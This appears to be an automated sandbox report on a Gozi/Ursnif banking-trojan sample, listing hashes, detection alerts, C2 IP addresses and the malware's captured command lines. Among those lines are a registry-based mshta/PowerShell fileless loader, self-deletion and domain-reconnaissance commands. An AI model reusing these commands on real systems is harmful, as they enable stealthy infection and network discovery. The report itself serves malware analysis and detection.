SHA256 debf0f9197fc77deffee03e5df0bebb537557ae76cd8d0f41d9c1f6c2cac5d07
SHA512 e71ae092062b36bf4ce6024a1c26b7653b8d487dd819c68c4db408d0dff4d7c65edc0eda51d91b70225c06dd85e79595404065471b8dc183c7962ad8e8bb50e3

C:\Users\Admin\AppData\Local\Temp\B64C.bin1

MD5 149dff51cd2f314a298e771fc72d03f0
SHA1 c7caa03e052c647a898afaad47b002aa9534cb41
SHA256 debf0f9197fc77deffee03e5df0bebb537557ae76cd8d0f41d9c1f6c2cac5d07
SHA512 e71ae092062b36bf4ce6024a1c26b7653b8d487dd819c68c4db408d0dff4d7c65edc0eda51d91b70225c06dd85e79595404065471b8dc183c7962ad8e8bb50e3

C:\Users\Admin\AppData\Local\Temp\B64C.bin1

MD5 8652b48a8ac9bade20c83603a6a3bbf2
SHA1 35ac2762e5ffbffc690bcdd89542772a6efcbf47
SHA256 edc82ced7fc0ead27d01b73c2cb86955d549d24e732c879aa6a1a99e9b42dc27
SHA512 2efaadd046333fa70336e0827763ea234e244659e2038e75af0d5a52f907743ed280775bf0e437850464612c55644952a889fd28c89d5f37033af52fa1f5676b

C:\Users\Admin\AppData\Local\Temp\B64C.bin1

MD5 8652b48a8ac9bade20c83603a6a3bbf2
SHA1 35ac2762e5ffbffc690bcdd89542772a6efcbf47
SHA256 edc82ced7fc0ead27d01b73c2cb86955d549d24e732c879aa6a1a99e9b42dc27
SHA512 2efaadd046333fa70336e0827763ea234e244659e2038e75af0d5a52f907743ed280775bf0e437850464612c55644952a889fd28c89d5f37033af52fa1f5676b

C:\Users\Admin\AppData\Local\Temp\B64C.bin1

MD5 e1c7d08d1a02ec4b5902108cfb38d71a
SHA1 2b0654d63707264359ee4d85cf7582c7504dbfb7
SHA256 4c54aff7706e1968b6a8388cd4f95027cb6d013ef344a656dfec7cfc6e7f5674
SHA512 8b088198d14fa36cafac610248a6ea58af38479fe7ce83f6aa6aba241e2fffafd14f59875278d46515834e9736cf4546f7c459197b6a15026dc139ba54bf2169

C:\Users\Admin\AppData\Local\Temp\B64C.bin1

MD5 1b270ce8cf689665501cd3cd4586e95c
SHA1 4b990085f8e17dbc6b6b157ce334883cb92a2738
SHA256 1a91e7e5e7a8612a3477f95645a4905f836e5ce3d54c76cb977c4b669dd945b1
SHA512 8618d2f30121b4e5a406ac4f09f4f892416912370478366ac4c4335950a78722fbf39474c522406f1ac63e4b53d3cf8131674b4edaef047dbcd075ee2cfbfbde

C:\Users\Admin\AppData\Local\Temp\B64C.bin1

MD5 f470aea6bd5fb67af38da048a704d25a
SHA1 ce9b0d5ccb04bd7f0b253a28a0d7d3882a53b22a
SHA256 5fbf831cc3ba5c301eadcf6627b7f698de1cb1312bc4a38e068a33a8ede755dc
SHA512 d4e3807a9bdc89a0ae420a990823831c86def88ef45d024f1c5012914a93a718461bd08ce0c85019bb7ba596b3ac0077a98c0d09eb18366b236ebcaccf9bd80e

C:\Users\Admin\AppData\Local\Temp\B64C.bin1

MD5 f470aea6bd5fb67af38da048a704d25a
SHA1 ce9b0d5ccb04bd7f0b253a28a0d7d3882a53b22a
SHA256 5fbf831cc3ba5c301eadcf6627b7f698de1cb1312bc4a38e068a33a8ede755dc
SHA512 d4e3807a9bdc89a0ae420a990823831c86def88ef45d024f1c5012914a93a718461bd08ce0c85019bb7ba596b3ac0077a98c0d09eb18366b236ebcaccf9bd80e

C:\Users\Admin\AppData\Local\Temp\B64C.bin1

MD5 43bb3e188b907f67d3f0728a3abe86b0
SHA1 01f3cd381178ee0aa705519c1f911927eefd03e3
SHA256 0baf37a662ae1feffebc8c90324254ca595e57445a57fa3aa664e7a51e96481a
SHA512 cffee1c046ac112c886c54b74834be5fee02345cedad997ed9786bea41ad46cc2141411222f5abe7cbcd58c3fd3e1d3bf2b1b36b2b716a7f29bb29945e172988

C:\Users\Admin\AppData\Local\Temp\B64C.bin1

MD5 43bb3e188b907f67d3f0728a3abe86b0
SHA1 01f3cd381178ee0aa705519c1f911927eefd03e3
SHA256 0baf37a662ae1feffebc8c90324254ca595e57445a57fa3aa664e7a51e96481a
SHA512 cffee1c046ac112c886c54b74834be5fee02345cedad997ed9786bea41ad46cc2141411222f5abe7cbcd58c3fd3e1d3bf2b1b36b2b716a7f29bb29945e172988

C:\Users\Admin\AppData\Local\Temp\B64C.bin1

MD5 d15862389eff4bb86ffc4a86522d6eb0
SHA1 2c9a9985047ce668e41664e0bfb614782653d549
SHA256 414b90c0d1a9737e3514ef6099b21985ebdd9806a4c82b2bf6bb36d19df3709e
SHA512 3342ce49cc5f5664952c7b3a48045c6755ae7dc9ac4516747540cc5771147e1895fc7ccfeb941f3500d3b9859b37d482c742520c62bde5fddec29db3231a0127

C:\Users\Admin\AppData\Local\Temp\B64C.bin1

MD5 ea78941d66ce1a78a5640b3c1c9257e7
SHA1 956198310c55526e63caab19205f31fbe8bd062c
SHA256 5f589cd87449ebd2cdaf1722a8599143160248d8fc06de713fb5f30e4999f71d
SHA512 38854c4ea93a20879d500b0d9b7bf4c293f4f182fd90d4ad458929d342cdd5dffe0521384891a9402c7ff65f2f874d59381358550149ae9b15f56d5f7c26fff2

C:\Users\Admin\AppData\Local\Temp\B64C.bin1

MD5 eb1ca90d92b48fefcd626765be857e77
SHA1 3ae215030b91bb7797fe5553bc1159f5b38aaeec
SHA256 04da1e451255b69f882781c81c3b2b4056c423da3d138c6ccccf24007fe24427
SHA512 a8436a836a673c6a0ecd33a786c21618cfef5d5a584d9014a375b7248402076cf139f27228a3521560b412b3686cd546883f44ae3128140621e00c7860ed396e

C:\Users\Admin\AppData\Local\Temp\B64C.bin1

MD5 75356e39c5810752c6bcc2358b38147b
SHA1 934186a988e41e9cdfcb28d871cdebb6dde234b7
SHA256 d3ce17c2f49a1b75d2afb5efd8100e41d0fa21aa457506fccd1c8f14251f43ce
SHA512 bf5ccb8901387368cf0bb63af6866582c4cff577f065018ddac90df7140fd9702fa2f27220062f259daffe4de02e0479c84bab3790c8d857c5974ffa5e7766a6

C:\Users\Admin\AppData\Local\Temp\B64C.bin1

MD5 8350188cb6b9b13dbe3fcc2b1e3d3a44
SHA1 2db8ce4d9c4fd84727da79370d8f5f74f8509fb5
SHA256 6a6cb08eba512b904886a54be0a7a11e8a703e81de97fbb13183195f2ba0bd15
SHA512 6fa2b25bba27525b663b6d37c3cbc736fa6af67b8be668e7eda9f5e381166a9da9e252d61940f19a99141a8f810a3de9c909b8b6a51a9936a2f266af03582077

C:\Users\Admin\AppData\Local\Temp\B64C.bin1

MD5 8350188cb6b9b13dbe3fcc2b1e3d3a44
SHA1 2db8ce4d9c4fd84727da79370d8f5f74f8509fb5
SHA256 6a6cb08eba512b904886a54be0a7a11e8a703e81de97fbb13183195f2ba0bd15
SHA512 6fa2b25bba27525b663b6d37c3cbc736fa6af67b8be668e7eda9f5e381166a9da9e252d61940f19a99141a8f810a3de9c909b8b6a51a9936a2f266af03582077

C:\Users\Admin\AppData\Local\Temp\B64C.bin

MD5 8350188cb6b9b13dbe3fcc2b1e3d3a44
SHA1 2db8ce4d9c4fd84727da79370d8f5f74f8509fb5
SHA256 6a6cb08eba512b904886a54be0a7a11e8a703e81de97fbb13183195f2ba0bd15
SHA512 6fa2b25bba27525b663b6d37c3cbc736fa6af67b8be668e7eda9f5e381166a9da9e252d61940f19a99141a8f810a3de9c909b8b6a51a9936a2f266af03582077

Analysis: behavioral2

Detonation Overview

Submitted

2022-03-22 15:41

Reported

2022-03-22 15:47

Platform

win10v2004-en-20220113

Max time kernel

152s

Max time network

140s

Command Line

C:\Windows\System32\RuntimeBroker.exe -Embedding

Signatures

Gozi, Gozi IFSB

banker trojan gozi_ifsb

suricata: ET MALWARE Ursnif Payload Request (cook32.rar)

suricata

suricata: ET MALWARE Ursnif Payload Request (cook64.rar)

suricata

suricata: ET MALWARE Ursnif Variant CnC Beacon

suricata

suricata: ET MALWARE Ursnif Variant CnC Beacon - URI Struct M2 (_2F)

suricata

suricata: ET MALWARE Ursnif Variant CnC Data Exfil

suricata

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation C:\Windows\System32\mshta.exe N/A

Enumerates physical storage devices

Discovers systems in the same network

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\net.exe N/A
N/A N/A C:\Windows\system32\net.exe N/A
N/A N/A C:\Windows\system32\net.exe N/A

Enumerates processes with tasklist

Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A

Gathers system information

Description Indicator Process Target
N/A N/A C:\Windows\system32\systeminfo.exe N/A

Runs net.exe

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A

Suspicious behavior: CmdExeWriteProcessMemorySpam

Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\d41d05cc157f874f89c574c74c0e2c58.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\d41d05cc157f874f89c574c74c0e2c58.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\System32\cmd.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1268 wrote to memory of 1648 N/A C:\Users\Admin\AppData\Local\Temp\d41d05cc157f874f89c574c74c0e2c58.exe C:\Users\Admin\AppData\Local\Temp\d41d05cc157f874f89c574c74c0e2c58.exe
PID 1268 wrote to memory of 1648 N/A C:\Users\Admin\AppData\Local\Temp\d41d05cc157f874f89c574c74c0e2c58.exe C:\Users\Admin\AppData\Local\Temp\d41d05cc157f874f89c574c74c0e2c58.exe
PID 1268 wrote to memory of 1648 N/A C:\Users\Admin\AppData\Local\Temp\d41d05cc157f874f89c574c74c0e2c58.exe C:\Users\Admin\AppData\Local\Temp\d41d05cc157f874f89c574c74c0e2c58.exe
PID 1268 wrote to memory of 1648 N/A C:\Users\Admin\AppData\Local\Temp\d41d05cc157f874f89c574c74c0e2c58.exe C:\Users\Admin\AppData\Local\Temp\d41d05cc157f874f89c574c74c0e2c58.exe
PID 1268 wrote to memory of 1648 N/A C:\Users\Admin\AppData\Local\Temp\d41d05cc157f874f89c574c74c0e2c58.exe C:\Users\Admin\AppData\Local\Temp\d41d05cc157f874f89c574c74c0e2c58.exe
PID 4748 wrote to memory of 1464 N/A C:\Windows\System32\mshta.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4748 wrote to memory of 1464 N/A C:\Windows\System32\mshta.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1464 wrote to memory of 3680 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 1464 wrote to memory of 3680 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 3680 wrote to memory of 3864 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 3680 wrote to memory of 3864 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 1464 wrote to memory of 208 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 1464 wrote to memory of 208 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 208 wrote to memory of 2044 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 208 wrote to memory of 2044 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 1464 wrote to memory of 3032 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Explorer.EXE
PID 1464 wrote to memory of 3032 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Explorer.EXE
PID 1464 wrote to memory of 3032 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Explorer.EXE
PID 1464 wrote to memory of 3032 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Explorer.EXE
PID 3032 wrote to memory of 3428 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 3032 wrote to memory of 3428 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 3032 wrote to memory of 5092 N/A C:\Windows\Explorer.EXE C:\Windows\System32\cmd.exe
PID 3032 wrote to memory of 5092 N/A C:\Windows\Explorer.EXE C:\Windows\System32\cmd.exe
PID 3032 wrote to memory of 5092 N/A C:\Windows\Explorer.EXE C:\Windows\System32\cmd.exe
PID 3032 wrote to memory of 3428 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 3032 wrote to memory of 3428 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 3032 wrote to memory of 3752 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 3032 wrote to memory of 3752 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 3032 wrote to memory of 5092 N/A C:\Windows\Explorer.EXE C:\Windows\System32\cmd.exe
PID 3032 wrote to memory of 5092 N/A C:\Windows\Explorer.EXE C:\Windows\System32\cmd.exe
PID 5092 wrote to memory of 3440 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\PING.EXE
PID 5092 wrote to memory of 3440 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\PING.EXE
PID 5092 wrote to memory of 3440 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\PING.EXE
PID 3032 wrote to memory of 3752 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 3032 wrote to memory of 3752 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 3032 wrote to memory of 3944 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 3032 wrote to memory of 3944 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 3032 wrote to memory of 3944 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 3032 wrote to memory of 3944 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 5092 wrote to memory of 3440 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\PING.EXE
PID 5092 wrote to memory of 3440 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\PING.EXE
PID 3032 wrote to memory of 4524 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 3032 wrote to memory of 4524 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 4524 wrote to memory of 1308 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\nslookup.exe
PID 4524 wrote to memory of 1308 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\nslookup.exe
PID 3032 wrote to memory of 3548 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 3032 wrote to memory of 3548 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 3032 wrote to memory of 3224 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 3032 wrote to memory of 3224 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 3032 wrote to memory of 1036 N/A C:\Windows\Explorer.EXE C:\Windows\syswow64\cmd.exe
PID 3032 wrote to memory of 1036 N/A C:\Windows\Explorer.EXE C:\Windows\syswow64\cmd.exe
PID 3032 wrote to memory of 1036 N/A C:\Windows\Explorer.EXE C:\Windows\syswow64\cmd.exe
PID 3032 wrote to memory of 1036 N/A C:\Windows\Explorer.EXE C:\Windows\syswow64\cmd.exe
PID 3224 wrote to memory of 4256 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\systeminfo.exe
PID 3224 wrote to memory of 4256 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\systeminfo.exe
PID 3032 wrote to memory of 1036 N/A C:\Windows\Explorer.EXE C:\Windows\syswow64\cmd.exe
PID 3032 wrote to memory of 1036 N/A C:\Windows\Explorer.EXE C:\Windows\syswow64\cmd.exe
PID 3032 wrote to memory of 4156 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 3032 wrote to memory of 4156 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 3032 wrote to memory of 1572 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 3032 wrote to memory of 1572 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 1572 wrote to memory of 3076 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 1572 wrote to memory of 3076 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 3032 wrote to memory of 3412 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe

Processes

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\d41d05cc157f874f89c574c74c0e2c58.exe

"C:\Users\Admin\AppData\Local\Temp\d41d05cc157f874f89c574c74c0e2c58.exe"

C:\Users\Admin\AppData\Local\Temp\d41d05cc157f874f89c574c74c0e2c58.exe

"C:\Users\Admin\AppData\Local\Temp\d41d05cc157f874f89c574c74c0e2c58.exe"

C:\Windows\System32\mshta.exe

"C:\Windows\System32\mshta.exe" "about:<hta:application><script>Dsq4='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Dsq4).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\3B357854-5E29-2581-409F-72297443C66D\\\PlayStop'));if(!window.flag)close()</script>"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name rnxokhs -value gp; new-alias -name ciaisbj -value iex; ciaisbj ([System.Text.Encoding]::ASCII.GetString((rnxokhs "HKCU:Software\AppDataLow\Software\Microsoft\3B357854-5E29-2581-409F-72297443C66D").StopLocal))

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\f52evw42\f52evw42.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC0DC.tmp" "c:\Users\Admin\AppData\Local\Temp\f52evw42\CSC7C797FB70504A3AADFE5CB713FF399D.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\hvjrxi0u\hvjrxi0u.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC1B7.tmp" "c:\Users\Admin\AppData\Local\Temp\hvjrxi0u\CSCF687E3C2E95F45A4B0A5E441CCFA80AC.TMP"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\Admin\AppData\Local\Temp\d41d05cc157f874f89c574c74c0e2c58.exe"

C:\Windows\system32\PING.EXE

ping localhost -n 5

C:\Windows\system32\cmd.exe

cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\Admin\AppData\Local\Temp\96B8.bi1"

C:\Windows\system32\nslookup.exe

nslookup myip.opendns.com resolver1.opendns.com

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\96B8.bi1"

C:\Windows\system32\cmd.exe

cmd /C "systeminfo.exe > C:\Users\Admin\AppData\Local\Temp\48C0.bin1"

C:\Windows\syswow64\cmd.exe

"C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,

C:\Windows\system32\systeminfo.exe

systeminfo.exe

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\48C0.bin1"

C:\Windows\system32\cmd.exe

cmd /C "net view >> C:\Users\Admin\AppData\Local\Temp\48C0.bin1"

C:\Windows\system32\net.exe

net view

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\48C0.bin1"

C:\Windows\system32\cmd.exe

cmd /C "nslookup 127.0.0.1 >> C:\Users\Admin\AppData\Local\Temp\48C0.bin1"

C:\Windows\system32\nslookup.exe

nslookup 127.0.0.1

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\48C0.bin1"

C:\Windows\system32\cmd.exe

cmd /C "tasklist.exe /SVC >> C:\Users\Admin\AppData\Local\Temp\48C0.bin1"

C:\Windows\system32\tasklist.exe

tasklist.exe /SVC

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\48C0.bin1"

C:\Windows\system32\cmd.exe

cmd /C "driverquery.exe >> C:\Users\Admin\AppData\Local\Temp\48C0.bin1"

C:\Windows\system32\driverquery.exe

driverquery.exe

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\48C0.bin1"

C:\Windows\system32\cmd.exe

cmd /C "reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s >> C:\Users\Admin\AppData\Local\Temp\48C0.bin1"

C:\Windows\system32\reg.exe

reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\48C0.bin1"

C:\Windows\system32\cmd.exe

cmd /C "net config workstation >> C:\Users\Admin\AppData\Local\Temp\48C0.bin1"

C:\Windows\system32\net.exe

net config workstation

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 config workstation

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\48C0.bin1"

C:\Windows\system32\cmd.exe

cmd /C "nltest /domain_trusts >> C:\Users\Admin\AppData\Local\Temp\48C0.bin1"

C:\Windows\system32\nltest.exe

nltest /domain_trusts

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\48C0.bin1"

C:\Windows\system32\cmd.exe

cmd /C "nltest /domain_trusts /all_trusts >> C:\Users\Admin\AppData\Local\Temp\48C0.bin1"

C:\Windows\system32\nltest.exe

nltest /domain_trusts /all_trusts

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\48C0.bin1"

C:\Windows\system32\cmd.exe

cmd /C "net view /all /domain >> C:\Users\Admin\AppData\Local\Temp\48C0.bin1"

C:\Windows\system32\net.exe

net view /all /domain

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\48C0.bin1"

C:\Windows\system32\cmd.exe

cmd /C "net view /all >> C:\Users\Admin\AppData\Local\Temp\48C0.bin1"

C:\Windows\system32\net.exe

net view /all

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\48C0.bin1"

C:\Windows\system32\cmd.exe

cmd /U /C "type C:\Users\Admin\AppData\Local\Temp\48C0.bin1 > C:\Users\Admin\AppData\Local\Temp\48C0.bin & del C:\Users\Admin\AppData\Local\Temp\48C0.bin1"

Network

Country Destination Domain Proto
US 13.107.42.16:80 config.edge.skype.com tcp
NL 146.70.35.138:80 146.70.35.138 tcp
US 8.8.8.8:53 resolver1.opendns.com udp
US 208.67.222.222:53 resolver1.opendns.com udp
US 208.67.222.222:53 resolver1.opendns.com udp
US 208.67.222.222:53 resolver1.opendns.com udp
BE 193.56.146.148:80 193.56.146.148 tcp
US 13.107.42.16:80 config.edge.skype.com tcp
CA 67.43.234.14:80 67.43.234.14 tcp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 1.0.0.127.in-addr.arpa udp

Files

memory/1648-130-0x0000000000400000-0x000000000040D000-memory.dmp

memory/1648-132-0x0000000000400000-0x000000000040D000-memory.dmp

memory/1464-134-0x000001CE6D500000-0x000001CE6D522000-memory.dmp

